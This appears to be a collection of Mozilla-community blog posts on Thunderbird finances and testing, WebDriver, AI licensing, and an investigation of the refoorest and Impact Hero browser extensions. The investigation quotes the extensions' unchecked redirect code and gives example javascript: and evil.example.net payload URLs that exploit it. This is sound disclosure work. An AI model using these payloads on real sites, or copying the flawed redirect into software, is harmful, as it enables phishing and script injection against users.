And this super community helping us sustain and improve Thunderbird is very much a global one, with contributions pouring in from more than 200 countries! The top five giving countries — Germany, the United States, France, the United Kingdom, and Japan — accounted for 63% of our contribution revenue and 50% of transactions. We believe this global support is a testament to the universal value of Thunderbird and the core values the project stands for.

Expenses

Now, let’s talk about how we’re using these funds to keep Thunderbird thriving well into the future. 

As with most organizations, employee-related expenses are the largest expense category. The second highest category for us is all the costs associated with distributing Thunderbird to tens of millions of users and the operations that help make that happen. You can see our spending across all categories below:

The Importance of Supporting Thunderbird

When I started at Thunderbird (in 2017), we weren’t on a sustainable path. The cost of building, maintaining and distributing Thunderbird to tens of millions of people was too great when compared against the financial contributions we had coming in. Fast forward to 2023 and we’re able to not only deliver Thunderbird to our users without worrying about keeping the lights on, but we are able to fix bugs, build new features and invest in new platforms (Android). It’s important for Thunderbird to exist because it’s not just another app, but one built upon real values.

Our values are:

  • We believe in privacy. We don’t collect your data or spy on you, what you do in Thunderbird is your business, not ours.
  • We believe in digital wellbeing. Thunderbird has no dark patterns, we don’t want you doomscrolling your email. Apps should help, not hurt, you. We want Thunderbird to help you be productive.
  • We believe in open standards. Email works because it is based on open standards. Large providers have undermined these standards to lock users into their platforms. We support and develop the standards to everyone’s benefit.

If you share these values, we ask that you consider supporting Thunderbird. The tech you use doesn’t have to be built upon compromises. Giving to Thunderbird allows us to create good software that is good for you (and the world). Consider giving to support Thunderbird today.

2023 Community Snapshot

As we’ve noted so many times in the previous paragraphs, it’s because of Thunderbird’s open source community that we exist at all. In order to better engage with and acknowledge everyone participating in our projects, this past year we set up a Bitergia instance, which is now public. Bitergia has allowed us to better measure participation in the community and find where we are doing well and improving, and areas where there is room for improvement. We’ve pulled out some interesting metrics below.

For reference, GitHub and Bugzilla measure developer contributions. TopicBox measures activity across our many mailing lists. Pontoon measures the activity from volunteers who help us translate and localize Thunderbird. SUMO measures the impact of Thunderbird’s support volunteers who engage with our users and respond to their varied support questions.

Contributor & Community Growth

Thank You

In conclusion, we’d simply like to thank this amazing community of Thunderbird supporters who give of their time and resources to create something great. 2023 and 2024 have been years of extraordinary improvement for Thunderbird and the future looks bright. We’re humbled and pleased that so many of you share our values of privacy, digital wellbeing and open standards. We’re committed to continuing to provide Thunderbird for free to everyone, everywhere – thanks to you!

The post State Of The Bird: Thunderbird Annual Report 2023-2024 appeared first on The Thunderbird Blog.

Support.Mozilla.OrgIntroducing Andrea Murphy

Hi folks,

Super excited to share with you all. Andrea Murphy is joining our team as a Customer Experience Community Program Manager, covering for Konstantina while she’s out on maternity leave. Here’s a short intro from Andrea:

Greetings everyone! I’m thrilled to join the team as Customer Experience Community Program Manager. I work on developing tools, programs and experiences that support, inspire and empower our extraordinary network of volunteers. I’m from Rochester, NY and when I’m not at the office, I’m chasing waterfalls around our beautiful state parks, playing pinball or planning road trips with carefully curated playlists that include fun facts about all of my favorite artists. I’m a pop culture enthusiast, and very good at pub trivia. Add me to your team!

You’ll get a chance to meet Andrea in today’s community call. In the meantime, please join me to welcome Andrea into our community. (:

Firefox Developer ExperienceFirefox WebDriver Newsletter 131

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 131 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in gaining some experience in software development, jump in.

We are always grateful to receive external contributions. Here are the ones which made it into Firefox 131:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to set up the work environment and check the list of mentored issues for Marionette.

General

Bug fixes

WebDriver BiDi

New: Add support for remaining arguments of “network.continueResponse”

In Firefox 131 we added support for the remaining arguments of the "network.continueResponse" command, such as cookies, headers, statusCode and reasonPhrase. This allows clients to modify cookies, headers, status codes (e.g., 200, 304), and status text (e.g., “OK”, “Not modified”) during the "responseStarted" phase, when a real network response is intercepted, while preserving the response body.

-> {
  "method": "network.continueResponse",
  "params": {
    "request": "12",
    "headers": [
      { 
        "name": "test-header", 
        "value": { 
          "type": "string", 
          "value": "42"
        }
      }
    ],
    "reasonPhrase": "custom status text",
    "statusCode": 404
  },
  "id": 2
}

<- { "type": "success", "id": 2, "result": {} }

Bug fixes

Wladimir PalantLies, damned lies, and Impact Hero (refoorest, allcolibri)

Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven’t been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment.

Colibri Hero (also known as allcolibri) is a company with a noble mission:

We want to create a world where organizations can make a positive impact on people and communities.

One of the company’s products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website:

Plantation financed by our partners

So the users merely need to have the extension installed, indicating that they want to make a positive impact. And since the concept was so successful, Colibri Hero recently turned it into an SDK called Impact Hero (also known as Impact Bro), so that it could be added to other browser extensions.

What the company carefully avoids mentioning: its 56,000 “partners” aren’t actually aware that they are financing tree planting. The refoorest extension and extensions using the Impact Hero SDK automatically open so-called affiliate links in the browser, making certain that the vendor pays them an affiliate commission for whatever purchases the users make. As the extensions do nothing to lead users to a vendor’s offers, this functionality likely counts as affiliate fraud.

The refoorest extension also makes very clear promises to its users: planting a tree for each extension installation, two trees for an extension review as well as a tree for each vendor visit. Clearly, this is not actually happening according to the numbers published by Colibri Hero themselves.

What does happen is careless handling of users’ data despite the “100% Data privacy guaranteed” promise. In fact, the company didn’t even bother to produce a proper privacy policy. There are various shady practices including a general lack of transparency, with the financials never disclosed. As proof of trees being planted the company links to a “certificate” which is … surprise! … its own website.

Mind you, I’m not saying that the company is just pocketing the money it receives via affiliate commissions. Maybe they are really paying Eden Reforestation (not actually called that any more) to plant trees and the numbers they publish are accurate. As a user, this is quite a leap of faith with a company that shows little commitment to facts and transparency however.

What is Colibri Hero?

Let’s get our facts straight. First of all, what is Colibri Hero about? To quote their mission statement:

Because more and more companies are getting involved in social and environmental causes, we have created a SaaS solution that helps brands and organizations bring impactful change to the environment and communities in need, with easy access to data and results. More than that, our technology connects companies and non-profit organizations together to generate real impact.

Our e-solution brings something new to the demand for corporate social responsibility: brands and organizations can now offer their customers and employees the chance to make a tangible impact, for free. An innovative way to create an engaged community that feels empowered and rewarded.

You don’t get it? Yes, it took me a while to understand as well.

This is about companies’ bonus programs. Like: you make a purchase, you get ten points for the company’s loyalty program. Once you have a few hundred of those points, you can convert them into something tangible: getting some product for free or at a discount.

And Colibri Hero’s offer is: the company can offer people to donate those points, for a good cause. Like planting trees or giving out free meals or removing waste from the oceans. It’s a win-win situation: people can feel good about themselves, the company saves themselves some effort and Colibri Hero receives money that they can forward to social projects (after collecting their commission of course).

I don’t know whether the partners get any proof of money being donated other than the overview on the Colibri Hero website. At least I could not find any independent confirmation of it happening. All photos published by the company are generic and from unrelated events. Except one: there is photographic proof that some notebooks (as in: paper that you write on) have been distributed to girls in Sierra Leone.

Few Colibri Hero partners report the impact of this partnership or even its existence. The numbers are, however, public on the Colibri Hero website if you know where to look for them and who those partners are. And since Colibri Hero left the directory index enabled for their Google Storage bucket, the logos of their partners are public as well.

So while Colibri Hero never published a transparency report themselves, it’s clear that they partnered up with less than 400 companies. Most of these partnerships appear to have never gone beyond a trial, the impact numbers are negligible. And despite Colibri Hero boasting their partnerships with big names like Decathlon and Foot Locker, the corresponding numbers are rather underwhelming for the size of these businesses.

Colibri Hero runs a shop which they don’t seem to link anywhere but which gives a rough impression of what they charge their partners. Combined with the public impact numbers (mind you, these have been going since the company was founded in 2021), this impression condenses into revenue numbers far too low to support a company employing six people in France, not counting board members and ethics advisors.

And what about refoorest?

This is likely where the refoorest extension comes in. While given the company’s mission statement this browser extension with its less than 100,000 users across all platforms (most of them on Microsoft Edge) sounds like a side hustle, it should actually be the company’s main source of income.

The extension’s promise sounds very much like that of the Ecosia search engine: you search the web, we plant trees. Except that with Ecosia you have to use their search engine while refoorest supports any search engine (as well as Linkedin and Twitter/X which they don’t mention explicitly). Suppose you are searching for a new pair of pants on Google. One of the search results is Amazon. With refoorest you see this:

Screenshot of a Google search result pointing to Amazon’s Pants category. Above it an additional link with the text “This affiliate partner is supporting refoorest’s tree planting efforts” along with the picture of some trees overlaid with the text “+1”.

If you click the search result you go to Amazon as usual. Clicking that added link above the search result however will send you to the refoorest.com domain, where you will be redirected to the v2i8b.com domain (an affiliate network) which will in turn redirect you to amazon.com (the main page, not the pants one). And your reward for that effort? One more tree added to your refoorest account! Planting trees is really easy, right?

One thing is odd about this extension’s listing on Chrome Web Store: for an extension with merely 20,000 users, 2.9K ratings is a lot.

Screenshot of a Chrome Web Store listing. The title says: “refoorest: plant trees for free.” The extension is featured, has 2.9K ratings with the average of 4.8 stars and 20,000 users.

One reason is: the extension incentivizes leaving reviews. This is what the extension’s pop-up looks like:

Screenshot of an extension pop-up. At the bottom a section titled “Share your love for refoorest” and the buttons “Leave a Review +2” and “Add your email +2”

Review us and we will plant two trees! Give us your email address and we will plant another two trees! Invite fifteen friends and we will plant a whole forest for you!

The newcomer: Impact Hero

Given the success of refoorest, it’s unsurprising that the company is looking for ways to expand this line of business. What they recently came up with is the Impact Hero SDK, or Impact Bro as its website calls it (yes, really). It adds an “eco-friendly mode” to existing extensions. To explain it with the words of the Impact Bros (highlighting of original):

With our eco-friendly mode, you can effortlessly plant trees and offset carbon emissions at no cost as you browse the web. This allows us to improve the environmental friendliness of our extension.

Wow, that’s quite something, right? And how is that possible? That’s explained a little further in the text:

Upon visiting one of these merchant partners, you’ll observe a brief opening of a new tab. This tab facilitates the calculation of the required carbon offset.

Oh, calculation of the required carbon offset, makes sense. That’s why it loads the same website that I’m visiting but via an affiliate network. Definitely not to collect an affiliate commission for my purchases.

Just to make it very clear: the thing about calculating carbon offsets is a bold lie. This SDK earns money via affiliate commissions, very much in the same way as the refoorest extension. But rather than limiting itself to search results and users’ explicit clicks on their link, it will do this whenever the user visits some merchant website.

Now this is quite unexpected functionality. Yet Chrome Web Store program policies require the following:

All functionalities of extensions should be clearly disclosed to the user, with no surprises.

Good that the Impact Hero SDK includes a consent screen, right? Here is what it looks like in the Chat GPT extension:

Screenshot of a pop-up with the title: “Update! Eco-friendly mode, Chat GPT.” The text says “Help make the world greener as you browse. Just allow additional permissions to unlock a better future.” There are buttons labeled “Allow to unlock” and “Deny.”

Yes, this doesn’t really help users make an informed decision. And if you think that the “Learn more” link helps, it leads to the page where I copied the “calculation of the required carbon offset” bullshit from.

The whole point of this “consent screen” seems to be tricking you into granting the extension access to all websites. Consequently, this consent screen is missing from extensions that already have access to all websites out of the box (including the two extensions owned by Colibri Hero themselves).

There is one more area that Colibri Hero focuses on to improve its revenue: their list of merchants that the extensions download each hour. This discussion puts the size of the list at 50 MB on September 6. When I downloaded it on September 17 it was already 62 MB big. By September 28 the list has grown to 92 MB. If this size surprises you: there are lots of duplicate entries. amazon.com alone is present 615 times in that list (some metadata differs, but the extensions don’t process that metadata anyway).

Affected extensions

In addition to refoorest I could identify two extensions bought by Colibri Hero from their original authors as well as 14 extensions which apparently added the Impact Hero SDK expecting their share of the revenue. That’s Chrome Web Store only; the refoorest extension at the very least also exists in various other extension stores, even though it has been removed from Firefox Add-ons just recently.

Here is the list of extensions I found and their current Chrome Web Store stats:

| Name | Weekly active users | Extension ID |
| --- | --- | --- |
| Bittorent For Chrome | 40,000 | aahnibhpidkdaeaplfdogejgoajkjgob |
| Pro Sender - Free Bulk Message Sender | 20,000 | acfobeeedjdiifcjlbjgieijiajmkang |
| Memory Match Game | 7,000 | ahanamijdbohnllmkgmhaeobimflbfkg |
| Turbo Lichess - Best Move Finder | 6,000 | edhicaiemcnhgoimpggnnclhpgleakno |
| TTV Adblock Plus | 100,000 | efdkmejbldmccndljocbkmpankbjhaao |
| CoPilot™ Extensions For Chrome | 10,000 | eodojedcgoicpkfcjkhghafoadllibab |
| Local Video-Audio Player | 10,000 | epbbhfcjkkdbfepjgajhagoihpcfnphj |
| AI Shop Buddy | 4,000 | epikoohpebngmakjinphfiagogjcnddm |
| Chat GPT | 700,000 | fnmihdojmnkclgjpcoonokmkhjpjechg |
| GPT Chat | 10,000 | jncmcndmaelageckhnlapojheokockch |
| Online-Offline MS Paint Tool | 30,000 | kadfogmkkijgifjbphojhdkojbdammnk |
| refoorest: plant trees for free | 20,000 | lfngfmpnafmoeigbnpdfgfijmkdndmik |
| Reader Mode | 300,000 | llimhhconnjiflfimocjggfjdlmlhblm |
| ChatGPT 4 | 20,000 | njdepodpfikogbbmjdbebneajdekhiai |
| VB Sender - Envio em massa | 1,000 | nnclkhdpkldajchoopklaidbcggaafai |
| ChatGPT to Notion | 70,000 | oojndninaelbpllebamcojkdecjjhcle |
| Listen On Repeat YouTube Looper | 30,000 | pgjcgpbffennccofdpganblbjiglnbip |

Edit (2024-10-01): Opera already removed refoorest from their add-on store.

But are they actually planting trees?

That’s a very interesting question, glad you asked. See, refoorest considers itself to be in direct competition with the Ecosia search engine. And Ecosia publishes detailed financial reports where they explain how much money they earn and where it went. Ecosia is also listed as a partner on the Eden: People+Planet website, so we have independent confirmation here that they in fact donated at least a million US dollars.

I searched quite thoroughly for comparable information on Colibri Hero. All I could find was this statement:

We allocate a portion of our income to operating expenses, including team salaries, social charges, freelancer payments, and various fees (such as servers, technical services, placement fees, and rent). Additionally, funds are used for communications to maximize the service’s impact. Then, 80% of the profits are donated to global reforestation projects through our partner, Eden Reforestation.

While this sounds good in principle, we have no idea how high their operational expenses are. Maybe they are donating half of their revenue, maybe none. Even if this 80% rule is really followed, it’s easy to make operational expenses (like the salary of the company founders) so high that there is simply no profit left.

Edit (2024-10-01): It seems that I overlooked them in the list of partners. So they did in fact donate at least 50 thousand US dollars. Thanks to Adrien de Malherbe of Colibri Hero for pointing this out. Edit (2024-10-02): According to the Internet Archive, refoorest got listed here in May 2023 and they have been in the “$50,000 - $99,999” category ever since. They were never listed with a smaller donation, and they never moved up either – almost like this was a one-time donation. As of October 2024, the Eden: People+Planet website puts the cost of planting a tree at $0.75.

And other than that they link to the certificate of the number of trees planted:

Screenshot of the text “Check out refoorest’s impact” followed by the statement “690,121 trees planted”

But that’s their own website, just like the maps of where trees are being planted. They can make it display any number.

Now you are probably thinking: “Wladimir, why are you so paranoid? You have no proof that they are lying, just trust them to do the right thing. It’s for a good cause!” Well, actually…

Remember that the refoorest extension promises its users that a specific number of trees will be planted? One for each extension installation, two for a review, one more tree each time a merchant website is visited? How many trees do you think came together this way?

One thing about Colibri Hero is: they don’t seem to be very fond of protecting data access. Not only are their partners’ stats public, the user data is as well. When the extension loads or updates the user’s data, there is no authentication whatsoever. Anybody can just open my account’s data in their browser provided that they know my user ID:

Screenshot of JSON data displayed in the browser. There are among others a timestamp field displaying a date and time, a trees field containing the number 14 and a browser field saying “chrome.”

So anybody can track my progress – how many trees I’ve got, when the extension last updated my data, that kind of thing. Any stalkers around? Older data (prior to May 2022) even has an email field, though this one was empty for the accounts I saw.

How might you get my user ID? Well, when the extension asks me to promote it on social networks and to my friends, these links contain my user ID. There are plenty of such links floating around. But as long as you aren’t interested in a specific user: the user IDs are incremental. They are even called row_index in the extension source code.

See that index value in my data? We now know that 2,834,418 refoorest accounts were created before I decided to take a look. Some of these accounts certainly didn’t live long, yet the average still seems to be beyond 10 trees. But even ignoring that: two million accounts are two million trees just for the install.

According to their own numbers refoorest planted fewer than 700,000 trees, far fewer than those accounts “earned.” In other words: when these users were promised real physical trees, that was a lie. They earned virtual points to make them feel good, while the actual count of trees planted was determined by the volume of affiliate commissions.

Wait, was it actually determined by the affiliate commissions? We can get an idea by looking at the historical data for the number of planted trees. While Colibri Hero doesn’t provide that history, the refoorest website was captured by the Internet Archive at a significant number of points in time. I’ve collected the numbers and plotted them against the respective date. Nothing fancy like line smoothing, merely lines connecting the dots:

A graph plotting the number of trees on the Y axis ranging from 0 to 700,000 against the date on X axis ranging from November 2020 to September 2024. The chart is an almost straight line going from the lower left to the upper right corner. The only outliers are two jumps in year 2023.

Well, that’s a straight line. There is a constant increase rate of around 20 trees per hour here (roughly 700,000 trees over almost four years, or about 34,000 hours, works out to around 20 per hour). And I hate to break it to you, but a graph like that is rather unlikely to depend on anything related to the extension, which certainly grew its user base over the course of these four years.

There are only two anomalies here where the numbers changed non-linearly. There is a small jump at the end of January or start of February 2023. And there is a far larger jump later in 2023 after a three-month period where the Internet Archive didn’t capture any website snapshots, probably because the website was inaccessible. When it did capture the number again it was already above 500,000.

The privacy commitment

The refoorest website promises:

100% Data privacy guaranteed

The Impact Hero SDK explainer promises:

This new feature does not retain any information or data, ensuring 100% compliance with GDPR laws.

Ok, let’s first take a look at their respective privacy policies. Here is the refoorest privacy policy:

Screenshot of a text section titled “Nature of the data collected” followed by unformatted text: “In the context of the use of the Sites, refoorest may collect the following categories of data concerning its Users: Connection data (IP addresses, event logs ...) Communication of personal data to third parties Communication to the authorities on the basis of legal obligations Based on legal obligations, your personal data may be disclosed by application of a law, regulation or by decision of a competent regulatory or judicial authority. In general, we undertake to comply with all legal rules that could prevent, limit or regulate the dissemination of information or data and in particular to comply with Law No. 78-17 of 6 January 1978 relating to the IT, files and freedoms. ”

If you find that a little bit hard to read, that’s because whoever copied that text didn’t bother to format lists and such. Maybe better to read it on the Impact Bro website?

Screenshot of an unformatted wall of text: “Security and protection of personal data Nature of the data collected In the context of the use of the Sites, Impact Bro may collect the following categories of data concerning its Users: Connection data (IP addresses, event logs ...) Communication of personal data to third parties Communication to the authorities on the basis of legal obligations Based on legal obligations, your personal data may be disclosed by application of a law, regulation or by decision of a competent regulatory or judicial authority. In general, we undertake to comply with all legal rules that could prevent, limit or regulate the dissemination of information or data and in particular to comply with Law No. 78-17 of 6 January 1978 relating to the IT, files and freedoms.”

Sorry, that’s even worse. Not even the headings are formatted here.

Either way, nothing shows appreciation for privacy like a standard text which is also used by pizza restaurants and similarly caring companies. Note how that references “Law No. 78-17 of 6 January 1978”? That’s some French data protection law that I’m pretty certain is superseded by GDPR. A reminder: GDPR came into effect in 2018, three years before Colibri Hero was even founded.

This privacy policy isn’t GDPR-compliant either. For example, it has no mention of consumer rights or who to contact if I want my data to be removed.

Data like what’s stored in those refoorest accounts which happen to be publicly visible. Some refoorest users might actually find that fact unexpected.

Or data like the email address that the extension promises two trees for. Wait, they don’t actually have that one. The email address goes straight to Poptin LTD, a company registered in Israel. There is no verification that the user owns the address, such as a double opt-in. But at least Poptin has a proper GDPR-compliant privacy policy.

There is plenty of tracking going on all around refoorest, with data being collected by Cloudflare, Google, Facebook and others. This should normally be explained in the privacy policy. Well, not in this one.

Granted, there is less tracking around the Impact Hero SDK, but it is still a far cry from the “not retain any information or data” promise. The “eco-friendly mode” explainer loads Google Tag Manager. The affiliate networks that extensions trigger automatically collect data, likely creating profiles of your browsing. And finally: why is each request going through a Colibri Hero website before redirecting to the affiliate network if no data is being collected there?

Happy users

We’ve already seen that a fair number of users leaving a review for the refoorest extension have been incentivized to do so. That’s the reason for “insightful” reviews like this one:

A five-star review from Jasper saying: “sigma.” Below it a text says “1 out of 3 found this helpful.”

Funny enough, several of them then complain about not receiving their promised trees. That’s due to an extension issue: the extension doesn’t actually track whether somebody writes a review; it simply adds two trees with a delay after the “Leave a review” button is clicked. A bug in the code makes it “forget” that it meant to do this if something else happens in between. Rather than fixing the bug they removed the delay in the current extension version. The issue is still present when you give them your email address though.

But what about the user testimonies on their webpage?

A section titled “What our users say” with three user testimonies, all five stars. Emma says: “The extension allows you to make a real impact without altering your browsing habits. It's simple and straightforward, so I say: YES!” Stef says: “Make a positive impact on the planet easily and at no cost! Download and start using refoorest today. What are you waiting for? Act now!” Youssef says: “This extension is incredibly user-friendly. I highly recommend it, especially because it allows you to plant trees without leaving your home.”

Yes, this sounds totally like something real users would say, definitely not written by a marketing person. And these user photos definitely don’t come from something like the Random User Generator. Oh wait, they do.

In that context it makes sense that one of the company’s founders engages with the users in a blog titled “Eco-Friendly Living” where he posts daily articles with weird ChatGPT-generated images. According to metadata, all articles have been created on the same date, and each article took around four minutes – he must be a very fast typer. Every article presents a bunch of brands, and the only thing (currently) missing to make the picture complete are affiliate links.

Security issue

It’s not like the refoorest extension or the SDK do much. Given that, the company managed to produce a rather remarkable security issue. Remember that their links always point to a Colibri Hero website first, only to then redirect to the affiliate network? Well, for some reason they thought that performing this redirect in the extension was a good idea.

So their extension and their SDK do the following:

if (window.location.search.indexOf("partnerurl=") > -1) {
  const url = decodeURIComponent(gup("partnerurl", location.href));

  location.href = url;

  return;
}

Found a partnerurl parameter in the query string? Redirect to it! You wonder what websites this code is active on? All of them of course! What could possibly go wrong…

Well, the most obvious thing to go wrong is: this might be a javascript: URL. A malicious website could open https://example.com/?partnerurl=javascript:alert(1) and the extension will happily navigate to that URL. This almost became a Universal Cross-Site Scripting (UXSS) vulnerability. Luckily, the browser prevents this JavaScript code from running, at least with Manifest V3.

It’s likely that the same vulnerability already existed in the refoorest extension back when it was using Manifest V2. At that point it was a critical issue. It’s only with the improvements in Manifest V3 that extensions’ content scripts are subject to a Content Security Policy which prevents execution of arbitrary JavaScript code.

So now this is merely an open redirect vulnerability. It could be abused for example to disguise link targets and abuse trust relationships. A link like https://example.com/?partnerurl=https://evil.example.net/ looks like it would lead to a trusted example.com website. Yet the extension would redirect it to the malicious evil.example.net website instead.

Conclusions

We’ve seen that Colibri Hero is systematically misleading extension users about the nature of its business. Users are supposed to feel good about doing something for the planet, and the entire communication suggests that the “partners” are contributing money because they share this goal. The aspect of (ab)using the system of affiliate marketing is never disclosed.

This is especially damning in case of the refoorest extension where users are being incentivized by a number of trees supposedly planted as a result of their actions. At no point does Colibri Hero disclose that this number is purely virtual, with the actual count of trees planted being far lower and depending on entirely different factors. Or rather no factors at all if their reported numbers are to be trusted, with the count of planted trees always increasing at a constant rate.

For the Impact Hero SDK this misleading communication is paired with clearly insufficient user consent. Most extensions don’t ask for user consent at all, and those that do aren’t allowing an informed decision. The consent screen is merely a pretense to trick the users into granting extended permissions.

This by itself is already in gross violation of the Chrome Web Store policies and warrants a takedown action. Other add-on stores have similar rules, and Mozilla in fact already removed the refoorest extension prior to my investigation.

Colibri Hero additionally shows a pattern of shady behavior, such as quoting fake user testimonies, referring to themselves as “proof” of their beneficial activity and a general lack of transparency about finances. None of this is proof that this company isn’t donating money as it claims to do, but it certainly doesn’t make them any easier to trust with it.

The technical issues and neglect for users’ privacy are merely a sideshow here. These are somewhat to be expected for a small company with limited financing. Even a small company can do better however if the priorities are aligned.

Mozilla ThunderbirdHelp Us Test the Thunderbird for Android Beta!

The Thunderbird for Android beta is out and we’re asking our community to help us test it. Beta testing helps us find critical bugs and rough edges that we can polish in the next few weeks. The more people who test the beta and ensure everything in the testing checklist works correctly, the better!

Help Us Test!

Anyone can be a beta tester! Whether you’re an experienced beta tester or you’ve never tested a beta image before, we want to make it easy for you. We are grateful for your time and energy, so we aim to make testing quick, efficient, and hopefully fun!!

The release plan is as follows, and we hope to stick to this timeline unless we encounter any major hurdles:

  • September 30 – First beta for Thunderbird for Android
  • Third week of October – first release candidate
  • Fourth week of October – Thunderbird for Android release

Download the Beta Image

Below are the options for where you can download the beta and get started:

We are still working on preparing F-Droid builds. In the meantime, please make use of the other two download mechanisms.

Use the Testing Checklist

Once you’ve downloaded the Thunderbird for Android beta, we’d like you to check that you can do the following:

  • Automatic Setup (user only provides email address and maybe password)
  • Manual Setup (user provides server settings)
  • Read Messages
  • Fetch Messages
  • Switch accounts
  • Move email to folder
  • Notify for new message
  • Edit drafts
  • Write message
  • Send message
  • Email actions: reply, forward
  • Delete email
  • NOT experience data loss

Test the K-9 Mail to Thunderbird for Android Transfer

If you’re already using K-9 Mail, you can help test an important feature: transferring your data from K-9 Mail to Thunderbird for Android. To do this, you’ll need to make sure you’ve upgraded to the latest beta version of K-9 Mail.

This transfer process is a key step in making it easier for K-9 Mail users to move over to Thunderbird. Testing this will help ensure a smooth and reliable experience for future users making the switch.

Later builds will additionally include a way to transfer your information from Thunderbird Desktop to Thunderbird for Android.

What we’re not testing

We know it’s tempting to comment about everything you notice in the beta. For the purpose of this short initial beta, we won’t be focusing on addressing longstanding issues. Instead, we ask you to be laser-focused on critical bugs, the checklist above, and issues that could prevent users from effectively interacting with the app, to help us deliver a great initial release.

Where to Give Feedback

Share your feedback on the Thunderbird for Android beta mailing list and see the feedback of other users. It’s easy to sign up and let us know what worked and more importantly, what didn’t work from the tasks above. For bug reports, please provide as much detail as possible including steps to reproduce the issue, your device model and OS version, and any relevant screenshots or error messages.

Want to chat with other community members, including other testers and contributors working on Thunderbird for Android? Join us on Matrix!

Do you have ideas you would like to see in future versions of Thunderbird for Android? Let us know on Mozilla Connect, our official site to submit and upvote ideas.

The post Help Us Test the Thunderbird for Android Beta! appeared first on The Thunderbird Blog.

Wil ClouserPyFxA 0.7.9 Released

We released PyFxA 0.7.9 last week (pypi). This added:

  • Support for key stretching v2. See the end of bug 1320222 for some details. V1 will continue to work, but we’ll remove support for it at some point in the future.
  • Upgraded to support (and test!) Python 3

Special thanks to Rob Hudson and Dan Schomburg for their efforts.

Don Martifair use alignment chart

Tantek Çelik suggests that Creative Commons should add a CC-NT license, like the existing Creative Commons licenses, but written to make it clear that the content is not licensed for generative AI training. Manton Reece likes the idea, and would allow training—but understands why publishers would choose not to. AI training permissions are becoming a huge deal, and there is a need for more licensing options. disclaimer: we’re taking steps in this area at work now. This is a personal blog post though, not speaking for employer or anyone else. In the 2024 AI Training Survey Results from Draft2Digital, only 5% of the authors surveyed said that scraping and training without a license is fair use.

Tantek links to the Creative Commons Position Paper on Preference Signals, which states,

Arguably, copyright is not the right framework for defining the rules of this newly formed ecosystem.

That might be a good point from the legal scholarship point of view, but the frequently expressed point of view of web people is more like, creepy bots are scraping my stuff, I’ll throw anything at them I can to get them to stop. Cloudflare’s one-click AI scraper blocker is catching on. For a lot of the web, the AI problem feels more like an emergency looting situation than an academic debate. AI training permissions will be a point where people just end up disagreeing, and where the Creative Commons approach to copyright, where the license deliberately limits the rights that a content creator can try to assert, is a bad fit for what many web people really want. People disagree on what is and isn’t fair use, and how far the power of copyright law should extend. And some free culture people who would prefer less powerful copyright laws in principle are not inclined to unilaterally refuse to use a tool that others are already using.

The techbro definition of fair use (what’s yours is open, what’s mine is proprietary) is clearly bogus, so we can safely ignore that—but it seems like Internet freedom people can be found along both axes of the fair use alignment chart. Yes, there are four factors, but generative AI typically uses the entire work, so we can ignore the “amount used” factor, and we’re generally talking about human-created personal cultural works, so the nature of the copyrighted works we’re arguing about is generally similar. So we’re down to two, which is good because I don’t know how to make 3- and 4-dimensional tables in HTML.

  • Market purist (work must not have a negative effect on the market for the original):
    • Transformative purist (work must be significantly transformed): Memes are fair use
    • Transformative neutral (work must be somehow transformed): AI business presentation assistants are fair use
    • Transformative chaotic (work may be transformed): A verbatim quotation from a book in a book review is fair use
  • Market neutral (work may have some effect on the market):
    • Transformative purist: AI-generated ads are fair use
    • Transformative neutral: AI slop blogs are fair use
    • Transformative chaotic: New Portraits is fair use
  • Market chaotic (work may have significant effect on the market for the original):
    • Transformative purist: AI illustrations that mimic an artist’s style but not specific artworks are fair use
    • Transformative neutral: Orange Prince is fair use
    • Transformative chaotic: Grok is fair use

We’re probably going to end up with alternate free culture licenses, which is a good thing. But it’s probably not realistic to get organizations to change their alignment too much. Free culture licensing is too good of an idea to keep with one licensing organization, just like free software foundations (lower case) are useful enough that it’s a good idea to have a redundant array of them.

Do we need a toothier, more practical license?

This site is not licensed under a Creative Commons license, because I have some practical requirements that aren’t in one of the standard CC licenses. These probably apply to more sites than just this one. Personally, I would be happier with a toothier license that covers some of the reasons I don’t use CC now.

  • No permission for generative AI training (already covered this)

  • Licensee must preserve links when using my work in a medium where links work. I’m especially interested in preserving link rel=author and link rel=canonical. I would not mind giving general permission for copying and mirroring material from this site, except that SEO is a thing. Without some search engine signal, it would be too easy for a copy of my stuff on a higher-ranked site to make this site un-findable. I’m prepared to give up some search engine juice for giving out some material, just don’t want to get clobbered wholesale.

  • Patent license: similar to open-source software license terms. You can read my site but not use it for patent trolling. If you use my content, I get a license to any of your patents that would be infringed by making the content and operating the site.

  • Privacy flags: this site is licensed for human use, not for sale or sharing of personal info for behavioral targeting. I object to processing of any personal information that may be collected or inferred from this site.

In general, if I can’t pick a license that lets me make content available to people doing normal people stuff, but not to non-human entities with non-human goals, I will have to make the people ask me in person. Putting a page on the web can have interesting consequences, and a web-aware license that works for me will probably need to color outside the lines of the ideal copyright law that would make sense if we were coming up with copyright laws from scratch.

Bonus links

Knowledge workers Taylor’s model of workplace productivity depended entirely on deskilling, on the invention of unskilled labor—which, heretofore, had not existed.

Reverse-engineering a three-axis attitude indicator from the F-4 fighter plane In a normal aircraft, the artificial horizon shows the orientation in two axes (pitch and roll), but the F-4 indicator uses a rotating ball to show the orientation in three axes, adding azimuth (yaw).

Grid-scale batteries: They’re not just lithium Alternatives to lithium-ion technology may provide environmental, labor, and safety benefits. And these new chemistries can work in markets like the electric grid and industrial applications that lithium doesn’t address well.

Zen and the art of Writer Decks (using the Pomera DM250) Probably as a direct result of the increasing spamminess of the internet in general and Windows 11 in its own right, over the past few years a market has emerged for WriterDecks—single purpose writing machines that include a keyboard (or your choice of keyboard), a screen, and some minimal distraction-free writing software.

How Taylor Swift’s endorsement of Harris and Walz is a masterpiece of persuasive prose: a songwriter’s practical lesson in written advocacy

